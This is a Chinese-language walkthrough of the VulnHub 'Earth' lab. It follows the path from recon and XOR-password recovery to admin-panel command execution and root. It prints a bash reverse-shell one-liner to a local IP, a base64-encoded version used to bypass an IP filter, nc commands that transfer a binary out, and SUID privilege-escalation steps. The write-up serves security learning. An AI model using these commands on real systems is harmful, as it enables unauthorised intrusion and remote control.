earth

发表于 更新于 分类于 阅读次数: 本文字数: 2.4k 阅读时长 ≈ 2 分钟

靶机下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/

信息收集

先获取IP地址,使用sudo arp-scan -I eth0 -l

然后使用nmap获取端口信息,nmap -sC -sV -p 1-10000 -o result.txt 10.0.2.7

访问10.0.2.7发现会显示Bad Request

然后扫描发现443端口有DNS解析

将其加入hosts文件中,可以成功解析

使用https://terratest.earth.local/http://terratest.earth.local/分别访问(其他师傅是分别访问主域名和子域名)

然后使用dirsearch扫描发现了一些文件信息

外网渗透

访问robots.txt发现了一些信息,testingnotes.*文件经过测试发现是testingnotes.txt,然后进行访问

1
2
3
4
5
6
7
8
9
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

访问testdata.txt

1
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

根据意思进行解密:

key值:

1
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

得到密码为earthclimatechangebad4humans,上面已知账号为terra,然后在http://terratest.earth.local/admin/中进行登录

可以执行命令

进行反弹shell

bash -i >& /dev/tcp/10.0.2.15/7777 0&>1

发现没有反应,经过测试发现会过滤IP地址

这里使用base64编码进行绕过

echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuMTUvNzc3NyAwPiYx” | base64 -d|bash

内网渗透

查看是否有python的环境:whereis python

使用python获取更高级的shell

1
2
3
4
5
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
然后使用Crtl+Z将反弹shell置于后台
再使用	stty raw -echo;fg;reset	重新获取shell
shell就成功升级了

使用locate "flag"成功获取第一个flag

提权

使用find / -perm -u=s -type f 2>/dev/null获取具有SUID的二进制文件

但是无法进行运行

缺少了什么东西,将其下载到本地,使用nc下载二进制文件

1
2
在本地运行:nc -lp 7778 > reset_root
然后在靶机运行:nc -w 3 10.0.2.15[宿主机IP] 7778 < /usr/bin/reset_root

然后使用ltrace运行程序

ltrace:一个简单的程序,它将执行二进制文件直到或除非它退出。它将告诉我们所有库调用并拦截二进制文件进行的系统调用

要创建三个文件

1
2
3
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

重置密码为Earth,使用su root进行登录